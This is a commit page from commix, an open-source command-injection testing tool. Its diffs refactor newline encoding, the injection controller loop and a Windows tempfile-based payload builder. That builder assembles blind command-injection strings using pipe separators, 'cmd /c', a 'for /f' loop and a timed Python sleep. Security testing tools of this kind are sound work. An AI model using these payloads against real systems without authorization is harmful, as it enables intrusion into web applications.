Updated injection controller

commixproject · Mar 6, 2025 · 950d5a0 · 950d5a0
1 parent d7394fb
commit 950d5a0
Show file tree

Hide file tree

Showing 4 changed files with 18 additions and 29 deletions.
diff --git a/.gitignore b/.gitignore
diff --git a/src/core/injections/controller/checks.py b/src/core/injections/controller/checks.py
@@ -588,14 +588,9 @@ def ignore_google_analytics_cookie(cookie):
 """
 def newline_fixation(payload):
   payload = _urllib.parse.unquote(payload)
-  if settings.END_LINE.CR in payload:
-    #_ = payload.find("\r\n") + 1
-    #payload = _urllib.parse.quote(payload[:_]) + payload[_:]
-    payload = payload.replace(settings.END_LINE.CR,"%0d")
-  if settings.END_LINE.LF in payload:
-    #_ = payload.find("\n") + 1
-    #payload = _urllib.parse.quote(payload[:_]) + payload[_:]
-    payload = payload.replace(settings.END_LINE.LF,"%0a")
+  payload = _urllib.parse.quote(payload, safe='')
+  payload = payload.replace(settings.END_LINE.CR, "%0D%0A" if '\r\n' in payload else "%0D")
+  payload = payload.replace(settings.END_LINE.LF, "%0A")
   return payload
 
 """

diff --git a/src/core/injections/controller/controller.py b/src/core/injections/controller/controller.py
@@ -317,12 +317,9 @@ def check_parameter_in_http_header(check_parameter):
 """
 def injection_proccess(url, check_parameter, http_request_method, filename, timesec):
   settings.NOT_TESTABLE_PARAMETERS = False
-  for i in range(0,int(settings.OS_CHECKS_NUM)):
-    if settings.CHECK_BOTH_OS:
-      if i == 0:
-        settings.TARGET_OS = settings.OS.UNIX
-      else:
-        settings.TARGET_OS = settings.OS.WINDOWS
+  target_os_list = [settings.OS.UNIX, settings.OS.WINDOWS] if settings.CHECK_BOTH_OS else [settings.TARGET_OS]
+  for current_os in target_os_list:
+    settings.TARGET_OS = current_os
 
     if settings.PERFORM_BASIC_SCANS:
       checks.keep_testing_others(filename, url)
@@ -360,13 +357,12 @@ def injection_proccess(url, check_parameter, http_request_method, filename, time
     if not header_name == settings.COOKIE and not the_type == "HTTP Header":
       settings.CHECKING_PARAMETER = checks.check_http_method(url)
       settings.CHECKING_PARAMETER += ('', ' JSON')[settings.IS_JSON] + ('', ' SOAP/XML')[settings.IS_XML]
-    if header_name == settings.COOKIE :
-       settings.CHECKING_PARAMETER += str(header_name) + str(the_type) + str(inject_parameter)
-    else:
-       settings.CHECKING_PARAMETER += str(the_type) + str(header_name) + str(inject_parameter)
+    settings.CHECKING_PARAMETER = f"{the_type}{header_name}{inject_parameter}"
+    if header_name == settings.COOKIE:
+        settings.CHECKING_PARAMETER = f"{header_name} {the_type}{inject_parameter}"
 
     if check_parameter in settings.CUSTOM_INJECTION_MARKER_PARAMETERS_LIST:
-      settings.CHECKING_PARAMETER = "(custom) " + settings.CHECKING_PARAMETER
+      settings.CHECKING_PARAMETER = f"(custom) {settings.CHECKING_PARAMETER}"
 
     if not settings.LOAD_SESSION:
       info_msg = "Setting " + settings.CHECKING_PARAMETER  + " for tests."

diff --git a/src/core/injections/semiblind/techniques/tempfile_based/tfb_payloads.py b/src/core/injections/semiblind/techniques/tempfile_based/tfb_payloads.py
@@ -96,16 +96,14 @@ def decision(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_request_method):
 """
 def decision_alter_shell(separator, j, TAG, OUTPUT_TEXTFILE, timesec, http_request_method):
   if settings.TARGET_OS == settings.OS.WINDOWS:
-    python_payload = settings.WIN_PYTHON_INTERPRETER + " -c \"with open(r'" + OUTPUT_TEXTFILE + "') as file: print(len(file.read().strip()))\""
-    if separator == "|" or separator == "||" :
-      pipe = "|"
-      payload = (pipe +
-                settings.WIN_FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + settings.SINGLE_WHITESPACE + "'" + TAG + "'" + pipe +
-                "for /f \"tokens=*\" %i in ('cmd /c " +
-                python_payload +
-                "') do if %i==" + str(j) + settings.SINGLE_WHITESPACE +
-                "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\""
-                )
+    python_payload = f'{settings.WIN_PYTHON_INTERPRETER} -c "with open(r\'{OUTPUT_TEXTFILE}\') as file: print(len(file.read().strip()))"'
+    if separator in ("|", "||"):
+      payload = (
+        f'| {settings.WIN_FILE_WRITE_OPERATOR}{OUTPUT_TEXTFILE} "{TAG}" | '
+        f'for /f "tokens=*" %i in (\'cmd /c {python_payload}\') do '
+        f'if %i=={j} cmd /c {settings.WIN_PYTHON_INTERPRETER} '
+        f'-c "import time; time.sleep({2 * timesec + 1})"'
+      )
     elif separator == _urllib.parse.quote("&&") :
       #separator = _urllib.parse.quote(separator)
       ampersand = _urllib.parse.quote("&")